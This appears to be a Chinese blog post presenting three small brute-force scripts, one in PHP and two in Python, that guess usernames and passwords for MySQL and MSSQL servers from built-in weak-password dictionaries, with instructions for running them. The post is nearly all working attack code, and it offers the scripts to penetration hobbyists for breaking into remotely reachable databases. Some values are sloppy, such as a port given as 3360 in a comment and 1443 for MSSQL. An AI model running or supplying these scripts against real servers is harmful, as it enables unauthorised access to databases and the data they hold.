数据库账号密码猜解脚本PHP版+Python版
一、Mysql PHP版本爆破小脚本(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。 )
/* * author:Bearcat 2016-10-5 */ <html> <head> <title>Mysql账号密码爆破工具</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <center> <br><br> <h1>MysqlDatabaseBlasting(Mysql账号密码在线爆破工具 V1.0)</h1> <br> <?php if(@$_POST['submit']){ $host = @$_POST['host']; if($host!=""){ $username = "root";//用户名字典 $password = array('','123456','admin','root','ccf304vn'); //密码字典 echo "<hr><br>--------------------爆破状态--------------------<br>"; echo "密码错误次数:"; for ($i=0; $i <= count($password); $i++) { if(@mysql_connect($host, $username, $password[$i])){ echo "<br><br><font color='red'>爆破成功--密码-->".@$password[$i]."</font>"; break; }else{ echo $i."、"; continue; } } echo "<br>--------------------爆破结束--------------------<br><hr>"; }else{ echo "<script >alert('黑客,输入数据库IP地址')</script >"; } } ?> <br><br><br><br> <form action="MysqlDatabaseBlasting.php" method="post"> 数据库IP地址:<input type="text" name="host"/> <input type="submit" value="爆破" name="submit"/> </form> <center> </body> </html>
演示:
二、Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 )
import MySQLdb #coding=gbk #目标IP mysql数据库必须开启3360远程登陆端口 mysql_username = ('root','test', 'admin', 'user')#账号字典 common_weak_password = ('','123456','test','root','admin','user')#密码字典 success = False host = "127.0.0.1"#数据库IP地址 port = 3306 for username in mysql_username: for password in common_weak_password: try: db = MySQLdb.connect(host, username, password) success = True if success: print username, password except Exception, e: pass
演示:
三、Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,参考二的用法
import pymssql common_weak_password = ('','123456','test','root','admin','user')#密码字典 mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典 success = False host = "127.0.0.1"#数据库IP地址 port = 1443 for username in mssql_username: for password in common_weak_password: try: db = pymssql.connect(server=host, port=port, user=username, password=password) success = True if success: print username, password except Exception, e: pass
说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。